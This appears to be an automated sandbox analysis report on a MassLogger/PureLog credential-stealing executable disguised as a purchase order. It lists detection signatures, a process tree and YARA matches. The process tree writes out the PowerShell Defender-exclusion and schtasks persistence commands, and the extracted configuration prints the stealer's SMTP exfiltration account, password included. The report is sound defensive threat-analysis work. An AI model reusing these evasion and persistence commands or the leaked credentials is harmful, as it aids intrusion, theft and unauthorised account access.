Edit tour

Windows Analysis Report
PO #09465610_GQ 003745_SO-242000846.exe

Overview

General Information

Sample name:	PO #09465610_GQ 003745_SO-242000846.exe
Analysis ID:	1561085
MD5:	33ffa6b9a3022156b4592e17f1a9a074
SHA1:	8ec7beb8a9bb5c5fdf769698ea2abf553e6a655d
SHA256:	b336830d627101633db934f8d48606639c70d133a5985026bc250c035e887faf
Tags:	exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops VBS files to the startup folder

Drops executable to a common third party application directory

Drops large PE files

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Spawns drivers

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO #09465610_GQ 003745_SO-242000846.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)

Grinnellia.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)

RegSvcs.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

Grinnellia.exe (PID: 348 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)

RegSvcs.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

Trading_AIBot.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)

powershell.exe (PID: 1784 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6756 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1644 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

apihost.exe (PID: 7372 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 8EBEFAB8EF46B9960EDB099737B0E1ED)

server01.exe (PID: 4324 cmdline: "C:\Users\user\AppData\Local\Temp\server01.exe" MD5: 0CDBE0CD3CB5C2F0B2CB17E4417D43F5)

armsvc.exe (PID: 3868 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C427B6CE66EA0E5D2D3325158244AE4D)

alg.exe (PID: 1716 cmdline: C:\Windows\System32\alg.exe MD5: DA0B96A9E5E0F99A5EF268C07A1A1025)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 1708 cmdline: C:\Windows\system32\AppVClient.exe MD5: C694BB2A60BDA8FD88F36DC094FF6DB0)

elevation_service.exe (PID: 2860 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F691545D151C73AC2F1C8FC3F6553944)

maintenanceservice.exe (PID: 1020 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 27652B586B1E4F9793415650BFFAE22A)

wscript.exe (PID: 6152 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Grinnellia.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 33FFA6B9A3022156B4592E17F1A9A074)

RegSvcs.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\server01.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server01.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\server01.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server01.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\server01.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xff91:$a1: get_encryptedPassword 0x102cd:$a2: get_encryptedUsername 0xfd1e:$a3: get_timePasswordChanged 0xfe3f:$a4: get_passwordField 0xffa7:$a5: set_encryptedPassword 0x11977:$a7: get_logins 0x11628:$a8: GetOutlookPasswords 0x11406:$a9: StartKeylogger 0x118c7:$a10: KeyLoggerEventArgs 0x11463:$a11: KeyLoggerEventArgsEventHandler
0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x28f51:$a1: get_encryptedPassword 0x40f81:$a1: get_encryptedPassword 0x58fa1:$a1: get_encryptedPassword 0x2928d:$a2: get_encryptedUsername 0x412bd:$a2: get_encryptedUsername 0x592dd:$a2: get_encryptedUsername 0x28cde:$a3: get_timePasswordChanged 0x40d0e:$a3: get_timePasswordChanged 0x58d2e:$a3: get_timePasswordChanged 0x28dff:$a4: get_passwordField 0x40e2f:$a4: get_passwordField 0x58e4f:$a4: get_passwordField 0x28f67:$a5: set_encryptedPassword 0x40f97:$a5: set_encryptedPassword 0x58fb7:$a5: set_encryptedPassword 0x2a937:$a7: get_logins 0x42967:$a7: get_logins 0x5a987:$a7: get_logins 0x2a5e8:$a8: GetOutlookPasswords 0x42618:$a8: GetOutlookPasswords 0x5a638:$a8: GetOutlookPasswords
0000000F.00000002.3330930022.0000000003263000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 3252	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 3252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 3252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 3252	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 3252	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x38a2d:$a1: get_encryptedPassword 0x38d5a:$a2: get_encryptedUsername 0x387ce:$a3: get_timePasswordChanged 0x388ef:$a4: get_passwordField 0x38a43:$a5: set_encryptedPassword 0x3a3b5:$a7: get_logins 0x3a066:$a8: GetOutlookPasswords 0x39e44:$a9: StartKeylogger 0x3a305:$a10: KeyLoggerEventArgs 0x39ea1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: server01.exe PID: 4324	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: server01.exe PID: 4324	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: server01.exe PID: 4324	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: server01.exe PID: 4324	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x18d93:$a1: get_encryptedPassword 0x190c0:$a2: get_encryptedUsername 0x18b34:$a3: get_timePasswordChanged 0x18c55:$a4: get_passwordField 0x18da9:$a5: set_encryptedPassword 0x1a71b:$a7: get_logins 0x1a3cc:$a8: GetOutlookPasswords 0x1a1aa:$a9: StartKeylogger 0x1a66b:$a10: KeyLoggerEventArgs 0x1a207:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7088	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.RegSvcs.exe.2751e9e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.Grinnellia.exe.48a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.RegSvcs.exe.3d24dc0.10.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
13.2.RegSvcs.exe.3d24dc0.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x135a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12aa7:$a3: \Google\Chrome\User Data\Default\Login Data 0x12db5:$a4: \Orbitum\User Data\Default\Login Data 0x13bad:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.2751e9e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3c95570.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3d54e10.14.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.3d54e10.14.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.3d54e10.14.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.3d54e10.14.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
13.2.RegSvcs.exe.3d54e10.14.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x135a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12aa7:$a3: \Google\Chrome\User Data\Default\Login Data 0x12db5:$a4: \Orbitum\User Data\Default\Login Data 0x13bad:$a5: \Kometa\User Data\Default\Login Data
8.2.Grinnellia.exe.48a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
22.2.Grinnellia.exe.4090000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.RegSvcs.exe.2a50000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.RegSvcs.exe.3d54e10.14.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.3d54e10.14.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.3d54e10.14.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.3d54e10.14.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
13.2.RegSvcs.exe.3d54e10.14.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.2752d86.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3c96458.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.server01.exe.e40000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
15.0.server01.exe.e40000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.0.server01.exe.e40000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.0.server01.exe.e40000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
15.0.server01.exe.e40000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.2b90000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
